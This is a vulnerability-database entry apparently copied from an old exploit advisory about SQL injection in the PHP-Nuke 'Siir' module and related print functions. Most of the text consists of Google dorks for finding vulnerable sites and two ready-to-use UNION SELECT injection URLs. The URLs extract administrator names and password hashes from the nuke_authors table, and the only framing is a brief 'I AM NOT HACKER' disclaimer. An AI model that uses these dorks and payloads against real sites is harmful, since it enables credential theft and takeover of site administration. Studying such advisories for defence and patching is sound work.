PHP-Nuke Module Siir (id) Remote SQL Injection Vulnerability

2008-02-22T00:00:00
ID SSV:8149
Type seebug
Reporter Root
Modified 2008-02-22T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ###############################################################
#
# PHP-Nuke Siir SQL Injection(id)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MA陌L : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl: modules-php-name-Siir
#
# all (modules.php?name=xx) subject have secret print and
#
# and cant see op=print but cann- use exploit
#
################################################################
EXPLOIT :

modules.php?name=Siir&op=print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202

################################################################
# S@BUN i AM NOT HACKER S@BUN
################################################################


==================NOTE===================


###############################################################
#
# PHP-Nuke genaral print SQL Injection(id)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MA陌L : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl:"modules.php?name"print
#
# DORK 2 : allinurl:"modules.php?name=Hikaye"
#
# DORK : allinurl:"modules.php?name=Fikralar"
#
# DORK : allinurl:"modules.php?name=bilgi"
#
################################################################
example

http://xxxx/modules.php?name=(xxx subject)&(subject)=exploit

you cant see print id on google becouse all system have secret print and this exploit working simetimes but not always

EXPLOIT :

print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,0x3a,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202


################################################################
# S@BUN         i AM NOT HACKER         S@BUN
################################################################

# sebug.net